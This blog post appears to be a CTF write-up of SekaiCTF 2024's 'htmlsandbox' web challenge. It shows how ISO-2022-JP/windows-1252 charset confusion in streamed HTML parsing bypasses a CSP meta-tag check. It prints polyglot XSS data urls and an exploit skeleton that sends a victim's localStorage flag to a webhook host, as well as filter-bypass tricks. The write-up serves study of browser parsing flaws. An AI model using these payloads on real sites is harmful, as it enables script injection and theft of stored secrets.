Tuesday, September 3, 2024

SekaiCTF 2024 - htmlsandbox

Last weekend I competed in SekaiCTF. I spent most of the competition focusing on one problem: htmlsandbox. It was quite a challenge, and the least-solved web problem, with only 4 solves. However, I'm quite happy to say that I got it in the end, just a few hours before the competition ended.

The problem 

We are given a website that lets you post near-arbitrary HTML. The only restriction is that the following JavaScript checks must evaluate to true:

  • document.querySelector('head').firstElementChild.outerHTML === `<meta http-equiv="Content-Security-Policy" content="default-src 'none'">`
  • document.querySelector('script, noscript, frame, iframe, object, embed') === null
  • And there was a check for a bunch of "on" event attributes. Notably, they forgot to include onfocusin in the check, but you don't actually need it for the challenge.
     

This is all evaluated at save time by converting the HTML to a data: url and passing it to Puppeteer-controlled Chromium with JavaScript and external requests disabled. If it passes this validation, the HTML document is published on the web server.
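The challenge source isn't reproduced here, but the save-time validation presumably looks something like this minimal Puppeteer sketch. The function name and structure are my guesses, and the blocking of external requests is omitted; only the general shape (data: url navigation, page scripts disabled, checks run through evaluate()) is taken from the problem description.

const puppeteer = require('puppeteer');

// Rough sketch of the validator - a guess at its shape, not the actual challenge code
async function validate(html) {
  const browser = await puppeteer.launch();
  const page = await browser.newPage();
  await page.setJavaScriptEnabled(false); // scripts inside the page do not run during validation
  await page.goto('data:text/html,' + encodeURIComponent(html)); // loaded instantly, never over the network
  // evaluate() still works with page scripts disabled, so the checks can be run against the parsed DOM
  const ok = await page.evaluate(() =>
    document.querySelector('head').firstElementChild.outerHTML ===
      `<meta http-equiv="Content-Security-Policy" content="default-src 'none'">` &&
    document.querySelector('script, noscript, frame, iframe, object, embed') === null
  );
  await browser.close();
  return ok;
}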

There is also a report bot that you can tell to visit a page of your choosing. Unlike the validation bot, this is a normal Chrome instance with JavaScript enabled. It will also browse over the network instead of from a data: url, which may seem inconsequential but will have implications later. This bot has a "flag" item in its localStorage. The goal of the task is to extract this flag value.

The first (CSP) check is really the bulk of the challenge. The other JavaScript checks can easily be bypassed, either by using the forgotten onfocusin event handler or by using <template shadowrootmode="closed"><script>....</script></template>, which hides the script tag from document.querySelector().
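For illustration, either of the following would smuggle JavaScript past the querySelector() checks. These are my own sketches of the two bypasses mentioned above, not the payload from the challenge:

<!-- the script lives in a closed shadow root, so document.querySelector() in the light DOM can't see it -->
<div><template shadowrootmode="closed"><script>alert(document.domain)</script></template></div>

<!-- or, use the event attribute the check forgot about; autofocus makes it fire without interaction -->
<input autofocus onfocusin="alert(document.domain)">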

CSP meta tag

Placing <meta http-equiv="Content-Security-Policy" content="default-src 'none'"> in the <head> of a document disables all scripts on the page (since script-src inherits from default-src).

Normally CSP is specified in an HTTP header. Putting it inside the HTML document does come with some caveats:

  • It must be in the <head>. If it's in the <body>, it is ignored.
  • It does not apply to <script> tags (or anything else) that appear in the document before the <meta> tag (see the snippet just below).
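To illustrate that second caveat, in a document like this (a contrived example of my own), the first script runs but the second does not:

<head>
  <script>alert('runs: the CSP meta tag below has not been parsed yet')</script>
  <meta http-equiv="Content-Security-Policy" content="default-src 'none'">
  <script>alert('never runs: blocked by the policy above')</script>
</head>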

So my first thought was that maybe we could somehow get a <script> tag in before the meta tag. The challenge checks that the meta tag is the first element of <head>, but maybe we could put the <script> before the <head> element.

Turns out, the answer is no. Per the HTML5 spec, if you add content before the head, it acts as if you implicitly closed the <head> tag and started the <body>. No matter how you structure your document, the web browser fixes it up into something reasonable. You cannot put anything other than a comment (and DTDs/PIs) before the <head>.
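For example (this is my reading of the spec's tree-construction rules; it's easy to check by pasting into a devtools console), markup like

<div>x</div><head><meta http-equiv="Content-Security-Policy" content="default-src 'none'"></head>

gets fixed up into a DOM along the lines of

<html><head></head><body><div>x</div><meta http-equiv="Content-Security-Policy" content="default-src 'none'"></body></html>

with an empty <head>, the later <head> start tag ignored, and the <meta> relegated to the <body>, where (per the caveat above) the CSP is ignored anyway.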

I also thought about DOM clobbering, but it seemed pretty impossible given that document.querySelector() and === were used.

The other wrong turn I tried was redirecting the document. You can put a <meta http-equiv="refresh" content="0;url=http://example.com"> tag in a document to redirect the page somewhere else. My thought was that if I redirected the page quickly enough, maybe the checks would happen on a page I control.

The problem here is that network requests are disabled in Puppeteer, so I can't just redirect to some site I control. Chrome also blocks meta redirection to data: urls (I guess they were a common phishing vector or something), so those are out. And I can't use blob: urls, as I have no JavaScript with which to create one.

Similarly, if I instead tried to delay the redirect until after validation had finished, I would still have nowhere to redirect to, as I need a page with an XSS on the same origin in order to read the localStorage. Thus client-side redirection was out.

Lots of dead ends here.

The hint

Since no team had solved the problem for quite a while, the organizers provided a hint.

You may want to look for a parsing differential in streamed and non-streamed HTML parsing.

Alright, off to the HTML5 spec.

It's a big spec, but it seemed like section 13.2 (on parsing) would be the relevant part. After reading that part several times, the following seemed like the only thing the hint could possibly be referring to:

Section 13.2.3.2 Determining the character encoding:

The user agent may wait for more bytes of the resource to be available, either in this step or at any later step in this algorithm. For instance, a user agent might wait 500ms or 1024 bytes, whichever came first. In general preparsing the source to find the encoding improves performance, as it reduces the need to throw away the data structures used when parsing upon finding the encoding information. However, if the user agent delays too long to obtain data to determine the encoding, then the cost of the delay could outweigh any performance improvements from the preparse.

So during the algorithm for determining a character encoding (charset), browsers can choose to only apply it to the first part of the document if all the bytes of the document are not yet available.

More concretely, this means that for a data: url, the character encoding algorithm applies to the whole document as the document is available immediately. For a network load, it does not.

In our challenge, the validation bot loads from a data: url. The report bot loads from network. This seems like something we can exploit.

Charset confusion

I've heard of character set confusion before, but usually in the context of different systems supporting different character sets: for example, a validator that supports UTF-7, which has a non-ASCII-compatible encoding of < (+ADw-), while web browsers do not support UTF-7 and instead interpret a document with an unknown charset as UTF-8.

However, this is a bit different, since the validator and the ultimate viewer are the same program - both a web browser, both supporting the exact same charsets.

We need to find two character encodings that interpret the same document in different ways - one with the CSP policy and one without - and both encodings need to be supported by modern web browsers.

What character sets can we even possibly specify? First off, we can discard any encoding that always encodes <, > and " the way ASCII does, which rules out all of the single-byte legacy encodings. Browsers have intentionally removed support for the encodings that are most dangerous in this regard, such as UTF-7 and HZ, because of the problems they caused. Per the Encoding Standard, the only candidates left are the following legacy multi-byte encodings: Big5, EUC-JP, ISO-2022-JP, Shift_JIS, EUC-KR, UTF-16BE and UTF-16LE.

Looking through their definitions in the Encoding Standard, ISO-2022-JP stands out because it is stateful. In the other encodings, a specific byte might affect the interpretation of the next few bytes, but in ISO-2022-JP, a short byte sequence can change the meaning of the entire rest of the text.

ISO-2022-JP is not really a single encoding, but three encodings that can be switched between with special escape sequences. When in ASCII mode, the bytes are read as normal ASCII. But when in "katakana" mode, the same bytes get interpreted as Japanese characters.

This seems ideal for the purpose of creating a polyglot document, as we can switch the modes on and off to change the meaning of a wide swath of text.

An Example

Note: throughout this post I will use ^[ to refer to the ASCII escape character (0x1B). If you want to try these out as data: urls, replace the ^[ with %1B.

Consider the following HTML snippet:

<html><head><!-- ^[$BNq --><script>alert('here');</script><!-- ^[(B--></head></html>

When using a normal encoding like windows-1252 (aka ISO-8859-1) or UTF-8, the document looks just like you see above, just with the ^[ replaced with an unprintable character.

When viewed under the ISO-2022-JP encoding, it looks like:

<html><head><!-- 暦�⑬昭黹鱸頸鍾跂鶯├蒹鱚З纂�竰蜷�次⑬�--></head></html>

The ^[$BNq sequence switches the charset mode to katakana, and ^[(B switches it back to ASCII. Under windows-1252 these escape sequences are ignored, of course. Thus we have made a polyglot document that will pop an alert box only in windows-1252 mode.

If you want to try yourself:

data:text/html;charset=windows-1252,%3Chtml%3E%3Chead%3E%3C!--%20%1B$BNq%20--%3E%3Cscript%3Ealert('here');%3C/script%3E%3C!--%20%1B(B--%3E%3C/head%3E%3C/html%3E

vs

data:text/html;charset=iso-2022-jp,%3Chtml%3E%3Chead%3E%3C!--%20%1B$BNq%20--%3E%3Cscript%3Ealert('here');%3C/script%3E%3C!--%20%1B(B--%3E%3C/head%3E%3C/html%3E

Note how the body of the url is exactly the same. The only thing that differs is the charset specified in the mime type of the url, which completely changes the interpretation.
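You can also see the same divergence without data: urls by decoding identical bytes with two TextDecoders. This is just a quick sketch of mine for experimenting in a browser console (or Node with full ICU); it is not part of the challenge:

const bytes = new TextEncoder().encode('<!-- \x1b$BNq --><script>alert(1)</script><!-- \x1b(B -->');
console.log(new TextDecoder('windows-1252').decode(bytes)); // the script tag survives intact
console.log(new TextDecoder('iso-2022-jp').decode(bytes));  // the script tag is swallowed into Japanese text inside the comment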

Exploiting the detection algorithm

We now have the ability to make HTML that is very different depending on charset, but how do we make sure it is interpreted with different charsets in different contexts?

If we recall from the problem description: the validator loads the page via a data: url, which makes the full page available instantly. The victim loads the page over the network.

In the network case, Chrome will start parsing immediately and guess the charset before the entire document has arrived.

So in theory all we need to do is make the document really long, have the part at the beginning be evil under one charset, and add a charset declaration at the end for the other charset, under which the document looks benign. Browsers loading it all at once will see it as benign; browsers loading it over the network will see it as evil. This might look something like:

<html>
	<head>
        <!-- é - Add a windows-1252 character to make sure the early heuristics detect windows-1252 -->
        <!-- ^[$BNq From this part onwards it is visible only in windows-1252 mode -->
        <script> doSomeEvilStuff();x = new Image(); x.src='https://mywebhook?' + encodeURIComponent(localStorage['flag']); </script>
        <!-- Bunch of junk. Repeat this 3000 times to split amongst multiple packets -->
        <!-- ^[(B After this point, visible in both modes -->
        <meta http-equiv="Content-Security-Policy" content="default-src 'none'">
        <meta charset="iso-2022-jp">
    </head>
<body></body></html>

This should be processed the following way:

  • As a data: url - the browser sees the <meta charset="iso-2022-jp"> tag and processes the whole document in that charset. That means the <script> tag is interpreted as Japanese text inside an HTML comment, so it is ignored.
  • Over the network - the browser gets the first few packets. The <meta charset=..> tag has not arrived yet, so it uses a heuristic to guess the character encoding. It sees the é in windows-1252 encoding (we could use the same logic for UTF-8, but it seems the challenge transcodes things to windows-1252 as an artifact of naively using the atob() function), and guesses that the document's encoding is windows-1252. Later on it sees the <meta> tag, but by then it is too late, as part of the document has already been parsed. (Note: Chrome appears to deviate from the HTML5 spec here. The spec says that if a late <meta> tag is encountered, the document should be thrown out and reparsed, provided that is possible without re-requesting it from the network. Chrome seems to just switch charsets at the point of the meta tag and continue parsing.) The end result is that the first part of the document is interpreted as windows-1252, allowing the <script> tag to execute.

So I tried this locally.

It did not work.

It took me quite a while to figure out why. Turns out Chrome will wait a certain amount of time before proceeding to parse a partial response. The HTML5 spec suggests waiting for something like 500ms or 1024 bytes, whichever comes first, but it is unclear what Chrome actually does. Testing this on localhost of course makes the network much more efficient: the MTU of the loopback interface is 64KB, so each packet is much bigger, and everything happens much faster, so the timeout is much less likely to be hit.

Thus I did another test where I used a PHP script with <?php flush();sleep(1); ?> in the middle, to force a delay. This worked much better in my testing. Equivalently, I probably could have just tested against the remote version of the challenge.
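If you don't have PHP handy, a small Node server that deliberately splits the response works the same way. This is a hypothetical sketch of mine (the file name and the split offset are arbitrary), not something from the challenge:

const http = require('http');
const fs = require('fs');

http.createServer((req, res) => {
  const page = fs.readFileSync('exploit.html');          // the polyglot document from above
  res.writeHead(200, { 'Content-Type': 'text/html' });   // deliberately no charset in the header
  res.write(page.subarray(0, 4096));                     // first chunk: the é plus the "evil" windows-1252 part
  setTimeout(() => res.end(page.subarray(4096)), 1000);  // the rest, including <meta charset="iso-2022-jp">, arrives a second later
}).listen(8080);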

After several hours of trying to debug, I thus realized I had actually solved the problem several hours earlier :(. In any case, the earlier snippet worked when run against the remote.

Conclusion

This was a really fun challenge. It had me going over the HTML5 spec with a fine-tooth comb, as well as running many experiments to verify behaviour - the mark of an amazing web chall.

I do find it fascinating that the HTML5 spec says:

Warning: The decoder algorithms describe how to handle invalid input; for security reasons, it is imperative that those rules be followed precisely. Differences in how invalid byte sequences are handled can result in, amongst other problems, script injection vulnerabilities ("XSS").

 

And yet, Chrome had significant deviations from the spec. For example, after the pre-scan, <meta> tags inside <noscript> are supposed to be ignored when scripting is enabled, and yet they weren't. <meta> tags are supposed to be taken into account inside <script> tags during the pre-scan, and yet they weren't. According to the spec, if a late <meta> tag is encountered, browsers are supposed to either reparse the entire document or ignore the tag, but according to other contestants Chrome does neither and instead switches charsets midstream.

Thanks to Project Sekai for hosting a great CTF.